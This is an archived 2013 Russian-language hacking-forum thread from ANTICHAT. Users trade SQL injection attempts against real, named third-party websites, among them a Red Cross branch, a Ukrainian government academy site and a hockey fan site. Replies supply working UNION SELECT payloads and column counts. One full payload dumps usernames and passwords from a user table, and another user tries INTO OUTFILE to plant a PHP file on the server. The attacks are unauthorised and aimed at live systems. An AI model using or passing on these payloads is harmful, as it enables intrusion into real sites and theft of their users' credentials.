ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
23.08.2013, 15:06
|
|
Новичок
Регистрация: 13.06.2008
Сообщений: 1
Провел на форуме:
8301
Репутация:
0
|
|
Помогите пожалуйста сначало я вывел базу, она не открывалась.Теперь ничего не делается.Люди посоветуйте через Havij иньекцию делал
вот тут уязвимость
http://rp-gameworld.ru/index.php?c=registration&action=reg
|
|
|
23.08.2013, 15:57
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от migjee
migjee said:
Помогите пожалуйста сначало я вывел базу, она не открывалась.Теперь ничего не делается.Люди посоветуйте через Havij иньекцию делал
вот тут уязвимость
http://rp-gameworld.ru/index.php?c=registration&action=reg
Раскрытие путей же. Где тут инъекцию увидел?
|
|
|
|
23.08.2013, 19:43
|
|
Guest
Сообщений: n/a
Провел на форуме:
94006
Репутация:
24
|
|
Код:
Code:
http://www.redcross.org.ua/modules/news/index.php?id=-999
Ошибка вызывается только при дефисе перед переменной, при подбирании столбцов всё рушиться, обойти пробелы /**/ не получается..
Текст ошибки: SELECT * FROM aadm_menu WHERE id=: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
SECOND QUESTION ============================
Код:
Code:
http://www.amnu.gov.ua/index.php?p=calendar&action=events&show=public&sys_monat=08&sys_jahr=2013&sys_tag=24+union+select+1+--+&area=1#999
Выдаёт следующие:
Код:
Code:
Notice: Use of undefined constant HTTP - assumed 'HTTP' in /sata2/home/users/estet/www/www.amnu.gov.ua/class/class.Response.php on line 70 Warning: Cannot modify header information - headers already sent by (output started at /sata2/home/users/estet/www/www.amnu.gov.ua/class/class.Response.php:70) in /sata2/home/users/estet/www/www.amnu.gov.ua/class/class.Response.php on line 71
Warning: Cannot modify header information - headers already sent by (output started at /sata2/home/users/estet/www/www.amnu.gov.ua/class/class.Response.php:70) in /sata2/home/users/estet/www/www.amnu.gov.ua/class/class.Redir.php on line 22
что-нибудь может с этого получится
3 ==== вот это ещё интересно
Код:
Code:
http://ua.oriflame.com/utils/messages/message.jhtml?textKey=conference_not_available'&_requestid=406406
Error: Could not find resourcestring: key: conference_not_available' bundleName: com.oriflame.bundles.oriLiteralBundle
Тут вообще выходит всплывающее окно и не даёт дальше крутить
Код:
Code:
http://www.goldnsilverfactory.com/sub.php?db_cid=178%27
http://www.titanchair.ca/sub.php?db_cid=2%27
|
|
|
|
26.08.2013, 11:32
|
|
Guest
Сообщений: n/a
Провел на форуме:
132418
Репутация:
652
|
|
Сообщение от Unknowhacker
Unknowhacker said:
[CODE]
Code:
Тут вообще выходит всплывающее окно и не даёт дальше крутить
Код:
http://www.goldnsilverfactory.com/sub.php?db_cid=178%27
http://www.titanchair.ca/sub.php?db_cid=2%27
Здесь фильтр, но select+union пропускает:
1 случай: +union+select+1,2,3,4,5,6,7,8,9,10+--+
2 случай: +union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+
В обоих случаях поле 2 - принтабельное.
|
|
|
|
26.08.2013, 13:04
|
|
Guest
Сообщений: n/a
Провел на форуме:
3581
Репутация:
0
|
|
Можно ли здесь что-то сделать и в каком направлении рыть?
Код:
Code:
http://www.russian-hockey.ru/tppg/viewtprognosises.php?page_current=2&page_delim=1&sortby=&tm__id=&tor_nt_id=33&usr_id=1'
|
|
|
|
26.08.2013, 13:55
|
|
Guest
Сообщений: n/a
Провел на форуме:
132418
Репутация:
652
|
|
Сообщение от exstreme
exstreme said:
Можно ли здесь что-то сделать и в каком направлении рыть?
Код:
Code:
http://www.russian-hockey.ru/tppg/viewtprognosises.php?page_current=2&page_delim=1&sortby=&tm__id=&tor_nt_id=33&usr_id=1'
Правильно определили уязвимый параметр usr_id.
Далее подбираем количество столбцов:
+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19+--+
Версия " 5.1.49-Max-log"
Вот в этом направлении.
|
|
|
|
26.08.2013, 14:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
94006
Репутация:
24
|
|
Сообщение от exstreme
exstreme said:
Можно ли здесь что-то сделать и в каком направлении рыть?
Код:
Code:
http://www.russian-hockey.ru/tppg/viewtprognosises.php?page_current=2&page_delim=1&sortby=&tm__id=&tor_nt_id=33&usr_id=1'
Вот держи раскрученная.. я так понял.. новичок..
Код:
Code:
http://www.russian-hockey.ru/tppg/viewtprognosises.php?page_current=2&page_delim=1&sortby=&tm__id=&tor_nt_id=33&usr_id=-1+union+select+1,2,3,4,5,6,7,%28select%28@x%29from%28select%28@x:=0x00%29,%28select%28null%29from%28rh_tppg.usr%29where%280x00%29in%28@x:=concat%28@x,0x3c62723e,lognme,0x3a,pwd%29%29%29%29x%29,9,10,11,12,13,14,15,16,17,18,19+--+
P.S См. ниже графа "Очки" И уберите пробелы в URL
|
|
|
|
26.08.2013, 18:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
3581
Репутация:
0
|
|
Сообщение от Unknowhacker
Unknowhacker said:
Вот держи раскрученная.. я так понял.. новичок..
Спс, есть немного такое, у меня с union не прокатывало, я что-то и подумал, что здесь версия
|
|
|
|
26.08.2013, 18:28
|
|
Guest
Сообщений: n/a
Провел на форуме:
132418
Репутация:
652
|
|
[QUOTE="exstreme"]
exstreme said:
Спс, есть немного такое, у меня с union не прокатывало, я что-то и подумал, что здесь версия
p.s. согласно руководству по mysql переди послезнака комменария "--" cтавится пробел, т.е. +--+
|
|
|
|
26.08.2013, 19:45
|
|
Guest
Сообщений: n/a
Провел на форуме:
3581
Репутация:
0
|
|
есть такое, спасибо, думал (%28) что пробел.
Код:
Code:
http://www.russian-hockey.ru/tppg/viewtprognosises.php?page_current=2&page_delim=1&sortby=&tm__id=&tor_nt_id=33&usr_id=-1+union+select+1,2,3,4,5,'%3C?php%20echo%20%22test%22;?%3E',7,8,9,10,11,12,13,14,15,16,17,18,19+INTO+OUTFILE+'tested.php'+--+
А это почему не срабатывает?
посмотрел я на столбцы таблицы, и так понимаю они находятся в отдельной таблице, а кроме того на сайте как минимум присутствуют джумловские таблицы. Ну и собственно вопрос, можно ли как-то к ним подключиться или только в пределах этой таблицы? |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
